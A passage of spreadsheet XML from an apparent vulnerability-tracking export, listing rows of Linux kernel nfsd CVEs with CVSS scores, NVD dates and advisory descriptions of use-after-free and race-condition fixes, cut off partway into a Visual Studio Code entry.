      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix UAF in async copy cancel and shutdown
An async copy could be freed or used after free while a teardown caller
(OFFLOAD_CANCEL, nfsd4_shutdown_copy, nfsd4_cancel_copy_by_sb) raced the
copy kthread:
  - find_async_copy() bumped copy-&gt;refcount but left the copy on
    clp-&gt;async_copies, so the reaper's cleanup_async_copy() could run
    release_copy_files() concurrently with a cancel/shutdown caller. Both
    put and NULL nf_src/nf_dst without a common lock, double-putting the
    nfsd_file and freeing it early.
  - nfsd4_do_async_copy() set NFSD4_COPY_F_STOPPED before its final uses
    of the copy (nfsd_update_cmtime_attr() on copy-&gt;nf_dst,
    nfsd4_send_cb_offload()). nfsd4_stop_copy() treats a set STOPPED bit
    as "kthread done, skip kthread_stop()", so a teardown caller ran
    release_copy_files() -- which puts and NULLs nf_dst -- while the
    kthread still dereferenced it (NULL/UAF).
  - copy-&gt;copy_task was never pinned. The one-shot kthread self-reaps on
    return, so kthread_stop()'s get_task_struct() could touch a freed
    task_struct.
  - co_cb is embedded in the copy, but nfsd4_send_cb_offload() held a
    reference only on the client, so a concurrent teardown could free
    the copy while the CB_OFFLOAD callback was in flight.
Fix the teardown lifetime as a whole:
  - find_async_copy() unlinks the copy (clear cp_clp, list_del_init)
    under async_lock; the cancel, shutdown, and sb-cancel paths drop the
    list-membership reference via nfs4_put_copy() after nfsd4_stop_copy().
    Drop the now-redundant list_del fixup from cleanup_async_copy().
  - Because unlinking hides the copy from the reaper, its
    cleanup_async_copy() can no longer remove the copy's s2s_cp_stateids
    entry; the cancel/shutdown/sb-cancel paths now call
    nfs4_free_copy_state() themselves (while cp_clp is still valid) so
    the entry does not dangle at freed memory for the laundromat and
    manage_cpntf_state() to dereference.
  - Give the kthread its own reference, taken in nfsd4_copy() before
    wake_up_process() and dropped at the end of nfsd4_do_async_copy();
    call wake_up_process() before list_add().
  - Pin the task_struct with get_task_struct() in nfsd4_copy(), released
    in nfs4_put_copy(), so kthread_stop() is safe whenever the kthread
    exits. Set NFSD4_COPY_F_STOPPED only in nfsd4_stop_copy(), which now
    always kthread_stop()s before release_copy_files(); completion is
    still reported via NFSD4_COPY_F_COMPLETED, so
    nfsd4_has_active_async_copies() is unaffected. Each teardown caller
    removes the copy from clp-&gt;async_copies first, so kthread_stop() runs
    exactly once.
  - Take a copy reference in nfsd4_send_cb_offload(), dropped in
    nfsd4_cb_offload_release(). The kthread still holds its own reference
    there, so the refcount_inc() cannot race the final free.
  - Read cp_clp with smp_load_acquire() to pair with the unordered
    set_bit()/clear_bit() writers (Documentation/atomic_bitops.rst).</t>
        </is>
      </c>
      <c r="S86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89675</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89676</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix stale s2s_cp_stateids IDR entry for async COPY
For an async COPY, nfsd4_copy() called nfs4_init_copy_state() before
dup_copy_fields(), so the s2s_cp_stateids IDR was pointed at
&amp;u-&gt;copy-&gt;cp_stateid -- memory in the per-rqstp COMPOUND buffer that is
reused by the next request. dup_copy_fields() copies only the value into
async_copy, so the IDR slot dangled at the transient buffer for the whole
background copy. Any IDR walker then dereferences reused request memory:
the laundromat reads cs_type from it and, if the bytes look like an
expired NFS4_COPYNOTIFY_STID, follows into
refcount_dec()/idr_remove()/kfree() on garbage; manage_cpntf_state() has
the same exposure via idr_find().
Duplicate the fields first, then register the stateid on the stable
async_copy. result-&gt;cb_stateid is unchanged.</t>
        </is>
      </c>
      <c r="S87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89676</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89677</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix possible fh_compose of wrong dentry in nfsd4_create_file()
dentry_create() can hypothetically provide a different dentry than the
one passed in.  This could happen, for example, if the exported
filesystem is NFS, and the server returned to OPEN a filehandle which
matched a directory that was already in the dcache.  Clearly this would
not be expected!
If this were to happen the dentry (child) that was already stored in
resfhp could be freed and later dereferenced.
We shouldn't call fh_compose() until we are certain that we have the
final dentry, so this patch moved the fh_compose() call to two places:
one for the case where the target already exists, and one after
dentry_create() where it was created.</t>
        </is>
      </c>
      <c r="S88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89677</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89681</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix layout fence worker double-reference race
The workqueue core clears WORK_STRUCT_PENDING before the callback
is invoked, so delayed_work_pending() in lm_breaker_timedout() can
return false while the fence worker is already running. This lets
the breaker take a duplicate sc_count reference and schedule a new
worker that coalesces with the in-progress one. The extra reference
is never put, leaking the layout stateid.
Replace the racy delayed_work_pending() check with an
ls_fence_inflight boolean set atomically with
refcount_inc_not_zero() under ls_lock, and cleared under ls_lock
before the final nfs4_put_stid() on the dispose path; the retry
path intentionally retains it.  Remove the self-rearm
mod_delayed_work() at the top of the worker.</t>
        </is>
      </c>
      <c r="S89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89681</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89686</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix BUG_ON in nfsd4_alloc_layout_stateid on racing delegation revoke
nfsd4_alloc_layout_stateid reads fp-&gt;fi_deleg_file without holding
fi_lock when the parent stateid is a delegation. A concurrent delegation
revoke via the laundromat can clear fi_deleg_file under fi_lock, causing
nfsd_file_get() to return NULL and triggering the BUG_ON.
This race is client-reachable: two NFS clients can trigger it by having
one hold a delegation while another opens the same file to force a
recall. When the first client doesn't respond to the recall, the
laundromat revokes it. A concurrent LAYOUTGET from any client using the
delegation stateid hits the race window.
Fix this by taking fi_lock around the fi_deleg_file read in the
SC_TYPE_DELEG path, matching the locking discipline of the
find_any_file() arm, and replacing the BUG_ON with a graceful error
return that cleans up the partially-initialized layout stateid.</t>
        </is>
      </c>
      <c r="S90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89686</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89688</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: drop the stateid, not the stateowner, on seqid_op replay retry
In nfs4_preprocess_seqid_op() the stateid is obtained from
nfsd4_lookup_stateid(), which holds a reference on the nfs4_stid
(sc_count) but takes no reference on the stateowner. openlockstateid()
merely casts that stid and likewise takes no reference.
When nfsd4_cstate_assign_replay() returns -EAGAIN (the replay owner is
being torn down, RP_UNHASHED) it has not taken a stateowner reference on
that path. The error handling nevertheless called
nfs4_put_stateowner(stp-&gt;st_stateowner), dropping an so_count reference
the function never acquired -- risking a stateowner refcount underflow and
use-after-free -- while leaking the sc_count reference held on the stid.
The leaked stid reference can also stall a concurrent
nfsd4_close_open_stateid() waiting for sc_count to drop.
Drop the reference actually held -- the stid -- before retrying. The
stateowner stays alive through the reference held by the stid. This mirrors
the open path in nfsd4_process_open1(), where the put balances a reference
that path explicitly holds on the stateowner.</t>
        </is>
      </c>
      <c r="S91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89688</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89689</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: don't free session slots that are still in use
nfsd4_sequence() can free the very slot it is currently processing.
When the session shrinker has reduced se_target_maxslots below
se_fchannel.maxreqs, the shrink path checks three conditions before
calling free_session_slots():
  1. se_target_maxslots &lt; maxreqs  (shrink was advertised)
  2. slot-&gt;sl_generation == se_slot_gen  (slot is up-to-date)
  3. seq-&gt;maxslots &lt;= se_target_maxslots  (client acknowledges)
However, seq-&gt;slotid is never checked against se_target_maxslots.
A client using a slot in the range [se_target_maxslots, maxreqs) can
satisfy all three conditions: its slot has the current generation
(set by a prior SEQUENCE), and it sends sa_highest_slotid &lt;=
se_target_maxslots to acknowledge the reduction.
free_session_slots() then kfrees every slot at index &gt;=
se_target_maxslots, including the caller's own slot. The function
continues to write sl_seqid, sl_flags, sl_generation, and stores the
dangling pointer in cstate-&gt;slot. Later, nfsd4_store_cache_entry()
copies up to maxresp_cached bytes of the compound reply into the freed
sl_data[] array, corrupting whatever slab object now occupies that
address.
Additionally, a concurrent thread processing SEQUENCE on a different
high-numbered slot can have its slot freed out from under it.
NFSD4_SLOT_INUSE is set under nn-&gt;client_lock before the lock is
released, so any concurrent thread past SEQUENCE will have its slot
marked. However, free_session_slots() does not check NFSD4_SLOT_INUSE
before freeing.
Fix both problems by:
 1. Checking that the current request's slotid is below the shrink
    boundary.
 2. Scanning slots in the to-be-freed range for NFSD4_SLOT_INUSE and
    deferring the shrink if any are active.</t>
        </is>
      </c>
      <c r="S92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89689</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89702</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: size fh_verify server sockaddr slot by xpt_locallen
The nfsd_fh_verify and nfsd_fh_verify_err tracepoints declare the
server sockaddr slot sized by xpt_remotelen but fill it from
xpt_local using xpt_locallen:
    TP_STRUCT__entry(
            ...
            __sockaddr(server, rqstp-&gt;rq_xprt-&gt;xpt_remotelen)
            ...
    )
    TP_fast_assign(
            ...
            __assign_sockaddr(server, &amp;rqstp-&gt;rq_xprt-&gt;xpt_local,
                              rqstp-&gt;rq_xprt-&gt;xpt_locallen);
            ...
    )
When xpt_locallen exceeds xpt_remotelen, __assign_sockaddr's memcpy
writes past the reserved ring-buffer slot. In the reverse direction
(xpt_locallen &lt; xpt_remotelen) the slot is oversized and the
unwritten tail leaks prior ring-buffer contents to trace consumers.
The write-past-end case is reachable on NFS/UDP. svc_xprt_set_remote()
is only called from svc_tcp_accept() (net/sunrpc/svcsock.c) and from
the RDMA connect path; svc_create_socket() for UDP calls only
svc_xprt_set_local(), so xpt_remotelen stays 0 for the xprt's
lifetime. Every fh_verify trace for an NFSv2/v3-over-UDP request
then copies 16 or 28 bytes from xpt_local into a zero-byte slot.
The other NFSD tracepoints that record the server address
(NFSD_TRACE_PROC_CALL_FIELDS, NFSD_TRACE_PROC_RES_FIELDS,
SVC_RQST_ENDPOINT_FIELDS) already size the server slot by
xpt_locallen; nfsd_fh_verify and nfsd_fh_verify_err were the only
exceptions.
Fix by sizing the server slot with xpt_locallen so the declared slot
matches the copy length. The client slot and its assignment already
agree on xpt_remotelen and are left untouched.</t>
        </is>
      </c>
      <c r="S93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89702</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89703</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: set SC_STATUS_FREED in nfsd4_drop_revoked_stid for delegations
nfsd4_drop_revoked_stid() handles FREE_STATEID for admin-revoked
delegations but does not set SC_STATUS_FREED before releasing cl_lock.
revoke_delegation() uses this flag to detect whether FREE_STATEID has
already processed the delegation -- without it, the freed delegation is
added to cl_revoked via list_add(), producing a use-after-free when
cl_revoked is later traversed in __destroy_client().
The SC_STATUS_REVOKED path in nfsd4_free_stateid() (line 7983) already
sets SC_STATUS_FREED correctly. Apply the same pattern to the
SC_STATUS_ADMIN_REVOKED path in nfsd4_drop_revoked_stid().</t>
        </is>
      </c>
      <c r="S94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89703</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89708</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: RCU-protect cl_cb_session to fix use-after-free on session teardown
After a DESTROY_SESSION the per-session teardown path can free a
session while rpciod still holds an inflight callback rpc_task that
dereferences clp-&gt;cl_cb_session.  nfsd4_probe_callback_sync() flushes
cl_callback_wq, but once nfsd4_run_cb_work() has called
rpc_call_async() the rpc_task lives on rpciod; flushing the workqueue
does not wait for it.  rpc_shutdown_client() does drain rpciod tasks,
but uses a 1-second wait_event_timeout — tasks stuck in rpc_delay()
(e.g. 2-second NFS4ERR_DELAY retries) can outlive the drain.
    destroy path                       rpciod
    ------------                       ------
    unhash_session(ses)
    nfsd4_probe_callback_sync(clp)
      flush_workqueue(cl_callback_wq)
      /* returns; rpc_task still live */
    nfsd4_put_session_locked(ses)
    free_session(ses) -&gt; kfree(ses)
                                       nfsd4_cb_sequence_done()
                                         reads cb_clp-&gt;cl_cb_session
                                         /* freed slab */
A second window exists in nfsd4_process_cb_update().  When
__nfsd4_find_backchannel() returns NULL because unhash_session() has
already removed the destroyed session from cl_sessions,
setup_callback_client() takes the v4.1 early return so
clp-&gt;cl_cb_session = ses never fires and the field retains a pointer
to the about-to-be-freed session.
Fix both by converting cl_cb_session to an RCU-protected pointer:
  - Move the cl_cb_session = ses assignment in setup_callback_client()
    to after rpc_create() succeeds, so it is only published when a
    working backchannel exists.  Clear cl_cb_session on the error
    return in nfsd4_process_cb_update().  Both stores use
    rcu_assign_pointer().
  - Annotate cl_cb_session with __rcu.  All rpciod-side readers use
    rcu_read_lock()/rcu_dereference() and check for NULL, bailing to
    the appropriate error or requeue path:
    encode_cb_sequence4args(), decode_cb_sequence4resok(),
    nfsd41_cb_get_slot(), nfsd41_cb_release_slot(),
    nfsd4_cb_prepare(), and nfsd4_cb_sequence_done().
  - Switch __free_session() from kfree() to kfree_rcu() so the
    session slab is not reclaimed until after an RCU grace period,
    guaranteeing that rpciod readers inside rcu_read_lock() never
    dereference freed memory.
  - Pass the session pointer to the nfsd_cb_seq_status and
    nfsd_cb_free_slot tracepoints instead of having them re-read
    cl_cb_session.
  - nfsd4_cb_prepare() calls rpc_exit() when the session is NULL,
    routing through the done/release path to requeue the callback.</t>
        </is>
      </c>
      <c r="S95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89708</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89712</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: restart ssc_expire_umount walk after dropping nfsd_ssc_lock
nfsd4_ssc_expire_umount() walks nn-&gt;nfsd_ssc_mount_list with
list_for_each_entry_safe(ni, tmp, ...).  For each expired entry it
sets nsui_busy = true, drops nfsd_ssc_lock to run mntput() on the
source vfsmount, then reacquires the lock to list_del + kfree the
entry and continue iterating via the macro's saved tmp pointer.
The nsui_busy flag protects the current ni from concurrent
nfsd4_ssc_setup_dul() finders during the lock-drop window, but it
does not pin tmp.  Another nfsd RPC thread that fails its source-
server mount and reaches nfsd4_ssc_cancel_dul() will, during that
same window, take nfsd_ssc_lock, list_del + kfree its own ssc_umount
item, and release the lock.  If that item is the saved tmp of the
expire walk, the next iteration dereferences a freed
nfsd4_ssc_umount_item.
Restart the walk from the head after the mntput() unlock window so
no saved next pointer survives the lock-drop.  The list is bounded
by the number of active inter-server source mounts (typically small)
and the expire delayed-work runs periodically rather than per-IO,
so the restart is cheap.</t>
        </is>
      </c>
      <c r="S96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89712</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81376</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr"/>
      <c r="Q97" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-693</t>
        </is>
      </c>
      <c r="R97" s="5" t="inlineStr">
        <is>
